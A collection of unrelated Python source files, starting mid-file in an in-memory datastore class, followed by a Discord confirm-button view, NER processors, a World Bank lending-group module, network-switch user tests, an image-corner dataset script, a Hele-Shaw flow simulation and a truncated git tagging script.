keys_to_delete = []
for name, values in iteritems(record):
if name not in attributes:
continue
start = start or 0
if end is None:
end = (2**63) - 1 # sys.maxsize
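# Keep only values whose timestamp falls outside [start, end]; values inside the range are deleted.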
new_values = []
for value, timestamp in values:
if not start <= timestamp <= end:
new_values.append((value, int(timestamp)))
if new_values:
record[name] = new_values
else:
keys_to_delete.append(name)
for key in keys_to_delete:
record.pop(key)
except KeyError:
pass
@utils.Synchronized
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn="",
max_records=None,
relaxed_order=False):
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
if after_urn:
after_urn = utils.SmartUnicode(after_urn)
subjects = []
for s in self.subjects:
if s.startswith(subject_prefix) and s > after_urn:
subjects.append(s)
subjects.sort()
return_count = 0
for s in subjects:
if max_records and return_count >= max_records:
break
r = self.subjects[s]
results = {}
for attribute in attributes:
attribute_list = r.get(attribute)
if attribute_list:
encoded_value, timestamp = attribute_list[-1]
value = self._value_converter.Decode(attribute, encoded_value)
results[attribute] = (timestamp, value)
if results:
return_count += 1
yield (s, results)
@utils.Synchronized
def ResolveMulti(self, subject, attributes, timestamp=None, limit=None):
subject = utils.SmartUnicode(subject)
# Does timestamp represent a range?
if isinstance(timestamp, (list, tuple)):
start, end = timestamp # pylint: disable=unpacking-non-sequence
else:
start, end = -1, 1 << 65
start = int(start)
end = int(end)
if isinstance(attributes, str):
attributes = [attributes]
try:
record = self.subjects[subject]
except KeyError:
return
# Holds all the attributes which matched. Keys are attribute names, values
# are lists of timestamped data.
results = {}
for attribute in attributes:
for attr, values in iteritems(record):
if attr == attribute:
for encoded_value, ts in values:
results_list = results.setdefault(attribute, [])
# If we are always after the latest ts we clear older ones.
if (results_list and timestamp == self.NEWEST_TIMESTAMP and
results_list[0][1] < ts):
results_list = []
results[attribute] = results_list
# Timestamp outside the range, drop it.
elif ts < start or ts > end:
continue
value = self._value_converter.Decode(attribute, encoded_value)
results_list.append((attribute, ts, value))
# Return the results in the same order they requested.
remaining_limit = limit
for attribute in attributes:
# This returns triples of (attribute_name, timestamp, data). We want to
# sort by timestamp.
for _, ts, data in sorted(
results.get(attribute, []), key=lambda x: x[1], reverse=True):
if remaining_limit:
remaining_limit -= 1
if remaining_limit == 0:
yield (attribute, data, ts)
return
yield (attribute, data, ts)
@utils.Synchronized
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None):
unicode_to_orig = {utils.SmartUnicode(s): s for s in subjects}
result = {}
for unicode_subject, orig_subject in iteritems(unicode_to_orig):
values = self.ResolvePrefix(
unicode_subject, attribute_prefix, timestamp=timestamp, limit=limit)
if not values:
continue
if limit:
if limit < len(values):
values = values[:limit]
result[orig_subject] = values
limit -= len(values)
if limit <= 0:
return iteritems(result)
else:
result[orig_subject] = values
return iteritems(result)
def Flush(self):
pass
@utils.Synchronized
def ResolvePrefix(self, subject, attribute_prefix, timestamp=None,
limit=None):
"""Resolve all attributes for a subject starting with a prefix."""
subject = utils.SmartUnicode(subject)
if timestamp in [None, self.NEWEST_TIMESTAMP, self.ALL_TIMESTAMPS]:
start, end = 0, (2**63) - 1
# Does timestamp represent a range?
elif isinstance(timestamp, (list, tuple)):
start, end = timestamp # pylint: disable=unpacking-non-sequence
else:
raise ValueError("Invalid timestamp: %s" % timestamp)
start = int(start)
end = int(end)
if isinstance(attribute_prefix, str):
attribute_prefix = [attribute_prefix]
try:
record = self.subjects[subject]
except KeyError:
return []
# Holds all the attributes which matched. Keys are attribute names, values
# are lists of timestamped data.
results = {}
nr_results = 0
for prefix in attribute_prefix:
for attribute, values in iteritems(record):
if limit and nr_results >= limit:
break
if utils.SmartStr(attribute).startswith(prefix):
for encoded_value, ts in values:
results_list = results.setdefault(attribute, [])
# If we are always after the latest ts we clear older ones.
if (results_list and timestamp in [self.NEWEST_TIMESTAMP, None] and
results_list[0][1] < ts):
results_list = []
results[attribute] = results_list
# Timestamp outside the range, drop it.
elif ts < start or ts > end:
continue
value = self._value_converter.Decode(attribute, encoded_value)
results_list.append((attribute, ts, value))
nr_results += 1
if limit and nr_results >= limit:
break
result = []
for attribute_name, values in sorted(iteritems(results)):
# Values are triples of (attribute_name, timestamp, data). We want to
# sort by timestamp.
for _, ts, data in sorted(values, key=lambda x: x[1], reverse=True):
# Return triples (attribute_name, data, timestamp).
result.append((attribute_name, data, ts))
return result
def Size(self):
total_size = sys.getsizeof(self.subjects)
for subject, record in iteritems(self.subjects):
total_size += sys.getsizeof(subject)
total_size += sys.getsizeof(record)
for attribute, values in iteritems(record):
total_size += sys.getsizeof(attribute)
total_size += sys.getsizeof(values)
for value, timestamp in values:
total_size += sys.getsizeof(value)
total_size += sys.getsizeof(timestamp)
return total_size
def PrintSubjects(self, literal=None):
for s in sorted(self.subjects):
if literal and literal not in s:
continue
print(s)
|
StarcoderdataPython
|
1766927
|
<filename>src/ext/confirmer.py
import discord
class ConfirmerSession:
"""Class that interactively paginates
a set of embed using reactions."""
def __init__(self, page, color=discord.Color.green(), footer=''):
"""Confirmer, for confirming things obv duh."""
super().__init__()
self.page = page # the embed (discord.Embed) shown with the confirmation prompt
async def run(self, message):
"""Asks the user a question to confirm something."""
# We create the view and assign it to a variable so we can wait for it later.
view = Confirm()
message = await message.edit(embed=self.page, view=view)
# Wait for the View to stop listening for input...
await view.wait()
message = await message.edit(embed=self.page, view=view)
if view.value is None:
return False, message
elif view.value:
return True, message
else:
return False, message
# Define a simple View that gives us a confirmation menu
class Confirm(discord.ui.View):
def __init__(self):
super().__init__()
self.value = None
# This one is similar to the confirmation button except sets the inner value to `False`
@discord.ui.button(label="Cancel", style=discord.ButtonStyle.red)
async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = False
self.stop()
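# Remove both buttons once a choice is made (children shift down after each removal, so index 0 is removed twice).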
self.remove_item(self.children[0])
self.remove_item(self.children[0])
# When the confirm button is pressed, set the inner value to `True` and
# stop the View from listening to more input.
# We also send the user an ephemeral message that we're confirming their choice.
@discord.ui.button(label="Confirm", style=discord.ButtonStyle.green)
async def confirm(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = True
self.stop()
self.remove_item(self.children[0])
self.remove_item(self.children[0])
|
StarcoderdataPython
|
1654458
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: <NAME>
# Description:
# mrc_ner_data_processor.py
import os
from mrc_utils import read_mrc_ner_examples
class QueryNERProcessor(object):
# processor for the query-based ner dataset
def get_examples(self, data_dir, data_sign):
data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner."+data_sign))
return data
# def get_train_examples(self, data_dir):
# data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.train"))
# return data
# def get_dev_examples(self, data_dir):
# return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.dev"))
# def get_test_examples(self, data_dir):
# return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.test"))
class Conll03Processor(QueryNERProcessor):
def get_labels(self, ):
return ["ORG", "PER", "LOC", "MISC", "O"]
class MSRAProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["NS", "NR", "NT", "O"]
class Onto4ZhProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["LOC", "PER", "GPE", "ORG", "O"]
class Onto5EngProcessor(QueryNERProcessor):
def get_labels(self, ):
return ['ORDINAL', 'CARDINAL', 'LOC', 'WORK_OF_ART', 'LANGUAGE', 'ORG', 'FAC', 'PERSON', 'EVENT', 'TIME', 'LAW', 'NORP', 'PERCENT', 'DATE', 'GPE', 'QUANTITY', 'PRODUCT', 'MONEY', 'O']
class ResumeZhProcessor(QueryNERProcessor):
def get_labels(self, ):
return ["ORG", "LOC", "NAME", "RACE", "TITLE", "EDU", "PRO", "CONT", "O"]
class GeniaProcessor(QueryNERProcessor):
def get_labels(self, ):
return ['cell_line', 'cell_type', 'DNA', 'RNA', 'protein', "O"]
class ACE2005Processor(QueryNERProcessor):
def get_labels(self, ):
return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"]
class ACE2004Processor(QueryNERProcessor):
def get_labels(self, ):
return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"]
|
StarcoderdataPython
|
1646231
|
<reponame>mo-cmyk/wbgapi
'''Access information about World Bank lending groups. This works best with the WDI (source=2)
and other databases that share the same list of economies. It will probably not work
well with subnational databases or region-specific ones.
'''
import wbgapi as w
from . import utils
import builtins
def list(id='all', q=None):
'''Return a list of lending groups
Arguments:
id: a lending group identifier or list-like of identifiers
q: search string (on lending group name)
Returns:
a generator object
Example:
lendingGroups = {row['id']: row['value'] for row in wbgapi.lending.list()}
Notes:
The lending group list is global to the entire API and is not specific to the current database.
'''
q,_ = utils.qget(q)
for row in w.fetch('lendingtype/' + w.queryParam(id)):
if utils.qmatch(q, row['value']):
yield row
def get(id):
'''Retrieve the specified lending group
Arguments:
id: the lending group ID
Returns:
a lending group object
Example:
print(wbgapi.lending.get('IBD')['value'])
'''
return w.get('lendingtype/' + w.queryParam(id))
def members(id):
'''Return a set of economy identifiers that are members of the specified lending group
Arguments:
id: a lending group identifier
Returns:
a set object of economy identifiers
Notes:
the returned members may not match the economies in the current database since we access the universal region lists from the API
'''
return w.region.members(id, 'lendingtype')
def Series(id='all', q=None, name='LendingGroupName'):
'''Return a pandas Series object by calling list
'''
return w.Series(list(id, q=q), name=name)
def info(id='all', q=None):
'''Print a user report of lending groups
Arguments:
id: a lending group identifier or list-like of identifiers
q: search string (on lending group name)
Returns:
None
Notes:
The lending group list is global to the entire API and is not specific to the current database.
'''
return w.Featureset(list(id, q=q))
|
StarcoderdataPython
|
53115
|
import pytest
from pynetworking.Device import Device
def setup_dut(dut):
dut.reset()
dut.add_cmd({'cmd': 'show version', 'state': -1, 'action': 'PRINT', 'args': ["""
AlliedWare Plus (TM) 5.4.2 09/25/13 12:57:26
Build name : x600-5.4.2-3.14.rel
Build date : Wed Sep 25 12:57:26 NZST 2013
Build type : RELEASE
"""]})
def test_add_user(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser privilege 5 password enemy', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert 'testuser' not in d.user.keys()
d.user.create("testuser", password="<PASSWORD>", privilege_level=5)
assert 'testuser' in d.user.keys()
assert d.user['testuser']['privilege_level'] == '5'
with pytest.raises(KeyError) as excinfo:
d.user.create("", password="<PASSWORD>", privilege_level=5)
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.create("testuser", password="<PASSWORD>", privilege_level=5)
assert 'user name {0} already exists'.format('testuser') in excinfo.value
d.close()
def test_change_user_password(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 $<PASSWORD>HL/fM2F5<PASSWORD>c/54ZQ.
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username testuser privilege 5 password 8 <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser password <PASSWORD>', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username testuser password enemy', 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
assert old_pwd != d.user['testuser']['password']
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
assert old_pwd != d.user['testuser']['password']
old_pwd = d.user['testuser']['password']
d.user.update("testuser", password="<PASSWORD>")
with pytest.raises(KeyError) as excinfo:
d.user.update("")
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.update("xxxxxxxxxxxxxxxx", password="<PASSWORD>")
assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value
d.close()
def test_change_user_privilege(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 $1$bJoVec4D$JwOJGPr7YqoExA0GVasdE0
username testuser privilege 5 password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 $1$<PASSWORD>$JwOJGPr7YqoExA0GVasdE0
username testuser password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
username testuser privilege 5 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username testuser privilege 1', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username testuser privilege 5', 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert d.user['testuser']['privilege_level'] == '5'
d.user.update("testuser", privilege_level=1)
assert d.user['testuser']['privilege_level'] == '1'
d.user.update("testuser", privilege_level=5)
assert d.user['testuser']['privilege_level'] == '5'
d.close()
def test_remove_user(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
username testuser privilege 5 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'no username testuser', 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
d.user.delete("testuser")
with pytest.raises(KeyError):
d.user['testuser']
d.close()
def test_encrypted_password(dut, log_level, use_mock):
config_0 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_1 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username encuser privilege 10 password <PASSWORD>/
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_2 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
username encuser privilege 10 password 8 $1$CE<PASSWORD>$3JfHL/fM2F5YS47c/54ZQ.
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
config_3 = ["""
!
service password-encryption
!
no banner motd
!
username manager privilege 15 password 8 <PASSWORD>
!
ssh server allow-users manager
service ssh
!
interface port1.0.1-1.0.50
switchport
switchport mode access
!
interface vlan1
ip address 10.17.39.253/24
!
end
"""]
# Regular expressions are used. In emulated mode, if the password contains metacharacters like: . ^ $ * + ? { [ ] \ | ( )
# prepend a \ character to them, otherwise they won't match. Follow the example below.
enc_pwd_1 = <PASSWORD>/'
enc_pwd_2 = <PASSWORD>.'
re_enc_pwd_1 = <PASSWORD>/'
re_enc_pwd_2 = '\<PASSWORD>\.'
setup_dut(dut)
dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0})
dut.add_cmd({'cmd': 'username\s+encuser\s+privilege\s+10\s+password\s+8\s+' + re_enc_pwd_1, 'state': 0, 'action': 'SET_STATE', 'args': [1]})
dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1})
dut.add_cmd({'cmd': 'username\s+encuser\s+password\s+8\s+' + re_enc_pwd_2, 'state': 1, 'action': 'SET_STATE', 'args': [2]})
dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2})
dut.add_cmd({'cmd': 'no username encuser', 'state': 2, 'action': 'SET_STATE', 'args': [3]})
dut.add_cmd({'cmd': 'show running-config', 'state': 3, 'action': 'PRINT', 'args': config_3})
d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock)
d.open()
assert 'encuser' not in d.user.keys()
d.user.create("encuser", password=<PASSWORD>, privilege_level=10, encrypted=True)
assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items()
d.user.update("encuser", password=<PASSWORD>, encrypted=True)
assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items()
d.user.delete("encuser")
with pytest.raises(KeyError):
d.user['encuser']
with pytest.raises(KeyError) as excinfo:
d.user.delete("")
assert 'user name cannot be empty' in excinfo.value
with pytest.raises(KeyError) as excinfo:
d.user.delete("xxxxxxxxxxxxxxxx")
assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value
d.close()
|
StarcoderdataPython
|
3388685
|
<reponame>sinahmr/parted-vae
import json
import torch
from partedvae.models import VAE
def load(path, img_size, disc_priors, device):
path_to_specs = path + 'specs.json'
path_to_model = path + 'model.pt'
with open(path_to_specs) as specs_file:
specs = json.load(specs_file)
latent_spec = specs["latent_spec"]
model = VAE(img_size=img_size, latent_spec=latent_spec, c_priors=disc_priors, device=device)
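# map_location keeps the deserialized tensors on CPU so the checkpoint loads regardless of the device it was saved on.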
model.load_state_dict(torch.load(path_to_model, map_location=lambda storage, loc: storage))
return model
|
StarcoderdataPython
|
195721
|
import os
import numpy as np
import cv2
import csv
import utils
output_dir = "./multipleBackgroundsCorners"
if (not os.path.isdir(output_dir)):
os.mkdir(output_dir)
dir = "../data1"
with open(output_dir+"/gt.csv", 'a') as csvfile:
spamwriter_1 = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
for image in os.listdir(dir):
if image.endswith("jpg"):
if os.path.isfile(dir+"/"+image+".csv"):
with open(dir+"/"+image+ ".csv", 'r') as csvfile:
spamwriter = csv.reader(csvfile, delimiter=' ',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
img = cv2.imread(dir +"/"+ image)
print(image)
gt= []
for row in spamwriter:
gt.append(row)
# img = cv2.circle(img, (int(float(row[0])), int(float(row[1]))), 2,(255,0,0),90)
gt =np.array(gt).astype(np.float32)
# print gt
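# Normalize the ground-truth corner coordinates to [0, 1], then scale them to the 1080x1080 resized image.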
gt = gt / (img.shape[1], img.shape[0])
gt = gt * (1080, 1080)
img = cv2.resize(img, ( 1080,1080))
# for a in range(0,4):
# img = cv2.circle(img, tuple((gt[a].astype(int))), 2, (255, 0, 0), 9)
# cv2.imwrite("asda.jpg", img)
# 0/0
for angle in range(0,271,90):
img_rotate, gt_rotate = utils.rotate(img, gt,angle)
for random_crop in range(0,1):
img_list, gt_list = utils.getCorners(img_rotate, gt_rotate)
for a in range(0,4):
cv2.circle(img_list[a], tuple(gt_list[a]), 2,(255,0,0),2)
cv2.imwrite( output_dir+"/"+image + str(angle) +str(random_crop) + str(a) +".jpg", img_list[a])
spamwriter_1.writerow(( image + str(angle) +str(random_crop) + str(a) +".jpg", tuple(gt_list[a])))
|
StarcoderdataPython
|
1668209
|
<reponame>adrienbrunet/mixt
# coding: mixt
"""Ensure that the space before the ``/`` character is not mandatory"""
from mixt import html
from mixt.element import Element
def test_normal_tag_without_props():
assert str(<button />) == '<button></button>'
assert str(<button/>) == '<button></button>'
def test_normal_tag_with_props():
assert str(<button name="foo" />) == '<button name="foo"></button>'
assert str(<button name="foo"/>) == '<button name="foo"></button>'
def test_nochild_tag_without_props():
assert str(<link />) == '<link />'
assert str(<link/>) == '<link />'
def test_nochild_tag_with_props():
assert str(<link rel="foo" />) == '<link rel="foo" />'
assert str(<link rel="foo"/>) == '<link rel="foo" />'
def test_new_element_without_props():
class Foo(Element):
def render(self, context):
return <div data-name="foo"/>
assert str(<Foo />) == '<div data-name="foo"></div>'
assert str(<Foo/>) == '<div data-name="foo"></div>'
def test_new_element_with_props():
class Foo(Element):
class PropTypes:
name: str
def render(self, context):
return <div data-name="{self.name}"/>
assert str(<Foo name="foo" />) == '<div data-name="foo"></div>'
assert str(<Foo name="foo"/>) == '<div data-name="foo"></div>'
def test_with_python_value_at_the_end():
assert str(<button name={"foo"} />) == '<button name="foo"></button>'
assert str(<button name={"foo"}/>) == '<button name="foo"></button>'
assert str(<button name={"foo"} ></button>) == '<button name="foo"></button>'
assert str(<button name={"foo"}></button>) == '<button name="foo"></button>'
def test_with_python_kwargs_at_the_end():
kwargs = {'name': 'foo'}
assert str(<button {**kwargs} />) == '<button name="foo"></button>'
assert str(<button {**kwargs}/>) == '<button name="foo"></button>'
assert str(<button {**kwargs} ></button>) == '<button name="foo"></button>'
assert str(<button {**kwargs}></button>) == '<button name="foo"></button>'
|
StarcoderdataPython
|
138331
|
<gh_stars>0
import random
import numpy as np
import pandas as pd
import tqdm as tqdm
import matplotlib.pyplot as plt
# Initialize and create dataframe
headers = ['Particle_X', 'Particle_Y', 'q1', 'q2',
'q3', 'q4', 'q5', 'q6', 'Velocity_X', 'Velocity_Y']
dataset = pd.DataFrame(columns=headers)
# Physical Dimensions of 2D Hele-Shaw Cell
H = 1
w = 1
particle = 1
velocity = []
n = 6
# X represents the position of the particle (must be within the boundary)
x = []
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return str((self.x, self.y))
class Circle:
def __init__(self, origin, radius):
self.origin = origin
self.radius = radius
origin = Point(0, 0)
radius = w
circle = Circle(origin, radius)
for i in range(particle):
p = random.random() * 2 * np.pi
r = circle.radius * np.sqrt(random.random())
x.append([r * np.cos(p), r * np.sin(p)])
ParticleLocation = np.array(x)
# Q represents the vector that contains elements that represent the point flow rate values
# Summation of all Q must be = 0 to satisfy mass conservation
Q = []
for i in range(n-1):
Q.append(random.uniform(-1.0, 1.0))
Q.append(0-sum(Q))
# R represents the vector that contains elements that represent the coordinates of the ith source/sink
R = []
# Plotting the Circle and its inlets/outlets #
theta = np.linspace(0, 2 * np.pi, 100)
r = np.sqrt(1.0)
x1 = w * np.cos(theta)
x2 = w * np.sin(theta)
fig, ax = plt.subplots(1)
ax.plot(x1, x2)
ax.set_aspect(1)
plt.xlim(-1.25 * w, 1.25 * w)
plt.ylim(-1.25 * w, 1.25 * w)
plt.grid(linestyle='--')
plt.title('2D Hele-Shaw Point Source Model', fontsize=8)
plt.savefig("plot_circle_matplotlib_01.png", bbox_inches='tight')
# Determines the coordinates of the point sources/sinks based on number of inlet/outlet defined by n
for i in range(n):
R_coordinates = [w * np.cos(2 * (i - 1.0) * np.pi / n),
w * np.sin(2 * (i - 1.0) * np.pi / n)]
R.append(R_coordinates)
PointSource = np.array(R)
for idx, txt in enumerate(Q):
ax.annotate('{:.3f}'.format(txt), (R[idx]))
plt.scatter(*zip(*x))
plt.scatter(*zip(*R))
plt.show()
# Given the defined inlets/outlets, compute the velocity of the particle by superposing the point-source contributions
for i in range(n):
velocity.append(
Q[i] * (ParticleLocation - (R[i])) / (np.linalg.norm((ParticleLocation - (R[i]))))**2)
# Prints numerical results (for testing)
print("The randomized particle location, X : ")
print(ParticleLocation)
print("The randomized inlet and outlet flowrates Q : ")
print(np.array(Q))
print("The locations of the inlet/outlet : ")
print(PointSource)
print("The velocity of the particle : ")
print((sum(velocity)))
|
StarcoderdataPython
|
1619419
|
#!/usr/bin/env python
"""
This is a script to automatically tag repos on GitHub.
Sample usage:
* To create a tag:
$ python tagz.py -r mozilla/fireplace -c create -t 2014.02.11
NOTE: annotated tags are used by default (-a). If you want lightweight tags,
you can pass -l:
$ python tagz.py -l -r mozilla/fireplace -c create -t 2014.02.11
ALSO: this script will use whatever type of tag the first found refname is.
You cannot use this script to mix use of the two in the same repo.
* To create multiple tags:
$ python tagz.py -r mozilla/zamboni,mozilla/fireplace -c create -t 2014.02.11
* To delete a tag:
$ python tagz.py -r mozilla/fireplace -c delete -t 2014.02.11
* To cherry-pick a commit onto a tag:
$ python tagz.py -r mozilla/fireplace -c cherrypick -t 2014.02.11 -s b4dc0ffee
* To remove a commit from a tag:
$ python tagz.py -r mozilla/fireplace -c revert -t 2014.02.11 -s b4dc0ffee
"""
import datetime
import os
import platform
import subprocess
import argparse
GIT_ROOT_PATH = '/tmp/'
VERBOSE = False
DRYRUN = False
def _open_pipe(cmd, cwd=None):
return subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cwd)
def get_team_repo(remote_url):
"""
Takes remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`) and
returns team/repo pair (e.g., `mozilla/fireplace`).
"""
if ':' not in remote_url:
return remote_url
return remote_url.split(':')[1].replace('.git', '')
def get_remote_url(remote_url):
"""
Takes a GitHub remote URL (e.g., `mozilla/fireplace`) and
returns full remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`).
"""
if ':' not in remote_url:
remote_url = '<EMAIL>:' + remote_url
if not remote_url.endswith('.git'):
remote_url += '.git'
return remote_url
def get_git_path(remote_url):
repo = ''.join(x for x in get_team_repo(remote_url)
if x.isalnum() or x == '/')
dir_name = os.path.join(GIT_ROOT_PATH, repo.replace('/', '__'))
if not os.path.exists(dir_name):
os.makedirs(dir_name)
git(dir_name,
'clone {remote_url} {dir_name}'.format(remote_url=remote_url,
dir_name=dir_name))
return dir_name
def get_github_url(team, repo, url=''):
return 'https://github.com/{team}/{repo}{url}'.format(
team=team, repo=repo, url=url)
def git(path, args, limit=None):
if DRYRUN:
print 'cd %s; git %s' % (path, args)
return ''
if limit:
stdout, stderr = _open_pipe(['git'] + args.split(' ', limit),
cwd=path).communicate()
else:
stdout, stderr = _open_pipe(['git'] + args.split(' '),
cwd=path).communicate()
if VERBOSE and stderr:
print stderr
return stderr or stdout
def git_create_tag(path, tag, annotated):
# Create new tag. Assumes tag has no spaces.
if annotated:
git(path, 'tag -a %s -m tag for %s' % (tag, tag), 4)
else:
git(path, 'tag %s' % tag)
# Push tag.
git(path, 'push --tags')
def git_delete_tag(path, tag):
# Delete tag.
git(path, 'tag -d %s' % tag)
# Delete remote tag.
git(path, 'push origin :%s' % tag)
def pbcopy(data):
"""Copy to clipboard on Mac OS X/Linux."""
mac, linux = False, False
if os.name == 'mac' or platform.system() == 'Darwin':
mac = True
elif os.name == 'posix' or platform.system() == 'Linux':
linux = True
else:
return
if mac:
pb = _open_pipe(['pbcopy'])
elif linux:
pb = _open_pipe(['xsel', '--clipboard', '--input'])
pb.stdin.write(data)
pb.stdin.close()
return pb.wait()
def resolve_annotate(path, use_annotate):
"""Be internally consistent with tag type."""
retval = use_annotate
first_tag = (git(path, 'for-each-ref refs/tags --sort=refname --count=1 '
